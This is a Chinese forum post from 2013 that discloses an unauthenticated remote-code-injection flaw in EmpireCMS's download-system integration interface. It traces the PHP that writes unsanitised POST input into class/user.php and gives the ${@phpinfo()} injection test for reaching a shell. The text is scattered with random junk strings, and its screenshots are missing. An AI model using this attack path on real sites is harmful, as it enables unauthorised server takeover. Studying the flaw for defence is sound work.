帝国万能接口漏洞0day

admin · 发表于 2013-1-23 09:34:37

这是帝国的一套下载系统如图 ps(不需要任何账户和密码，直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口，如图而这个接口很多人又不会删除，由此他带来了很大的安全隐患，导致直接getshell，下面分析代码当我们! f) W( p0 f6 i

8 X- [& P0 F; B: N5 w5 M

* c( z0 `! l. s# e这是帝国的一套下载系统如图
0 g) z% Z' [0 pps(不需要任何账户和密码，直接写shell)

8 \; d4 U% d+ I% I( u
由于很多站是由于下载要整合discuz 等等一些论坛....
# |9 F( [# Y* C+ n: {' j1 y1 m  U
; ]* I7 b: H" J4 ]& X3 X- f0 _
而帝国他又有一个万能接口，如图

, I# g( v0 ^. y. E; C9 k: ]
, R0 T: M' F4 I; z) u  @' N8 T
而这个接口很多人又不会删除，由此他带来了很大的安全隐患，导致直接getshell，下面分析代码8 O+ k( b; U$ h$ y* m

$ t  M( k) O! `* a' Q9 B& [" v当我们提交的时候，他地址是提交到index.php?install=1&setup=SetConfig
1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}
复制代码
他这里开始调用一个SetUserCOMConfig的函数了，我们继续跟踪
1 n+ Y* u. R7 h
7 f3 I' _4 ]6 {" `. f在data/fun.php中的15行
: C7 w- N" J' ?' L+ g
! I* z. Q' L6 L& z我们可以看到这个函数
1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {4 p* B" P1 R/ A2 B8 M' R. y

17. InstallShowMsg(' /class/user.php 文件权限没有设为0777，安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);
复制代码
.....//省略若干
! J* y! _! U5 Y/ R  ^- _% G( {1 w. }! u7 y5 m6 r& k9 \6 r
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);2 |6 C' T. W7 W/ a+ i! D5 W

# G& @) L- I5 w* G他将传进来的变量进行了切割，然后赋给了$filetext4 p* q8 |% B+ T" G" ^
& w! d' n5 Y0 Q  y( k
然后看下面
1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777，安装不成功.');
6. }
7. @fputs($fp,$filetext);
复制代码
打开了一个class/user.php文件，然后将$filetext写入了8 C$ d" \, F  P, w3 D( x  T4 F, f

& p! i$ H3 F. ]2 M8 R0 h) Q3 U' n我们看看写入的结果，随便填一个

7 e# j7 z; b6 r/ _8 G; n3 Z6 ~) F9 O) \: h( }# X

) F0 K1 p+ \: K2 I
  V$ u7 u- v0 \$ s4 m$ Y! l+ G! n9 Q9 @, Z! i4 d% n
* X& k' ]$ E# [
) w+ W$ d7 [6 y7 A5 \, ?, f

9 j1 U7 X( O" M2 L* L  S0 [* |) a  A9 X3 \2 y  c

$ A5 _# a) r- ^5 G1 E# q3 \" |' @! i2 Z9 h
5 M) ^+ Z' _4 x  l  R7 |7 h& P9 f3 H6 n
8 @  v$ ^9 ]. V7 \# R1 {
+ c* p) g# m) G6 O& `
0 a0 t  l1 U0 E* a
; P" V9 ?" V9 I7 \2 ?* f8 |1 P/ ]

& {# s# y! B3 b* c6 R& L
& u3 L5 ]' L6 Z& N; K% I! M) a9 V  m7 S4 r, y

; H, p9 D% y+ a$ I7 A( ]1 z) R8 K
1 {- i/ R- f) e% E1 n% X# l' V. _* ^. G  M* N) g
所以我们淫荡点，写个${@phpinfo()}试试
# A; [' r, O% b" x, r8 {3 ?

然后访问以下class/user.php这个文件
( C" y/ l% r; R- }8 t% x日了吧
7 T$ I! d2 U" R& T* Q. Q

; l0 \5 i+ i+ \% t+ b6 ~/ d+ x0 [0 s6 V7 D1 ]
7 H& A6 r, F, N5 ?# s+ k8 B

! k  j% \' C  m, A

		自动登录	找回密码
密码			立即注册

帝国万能接口漏洞0day

本帖子中包含更多资源

浏览过的版块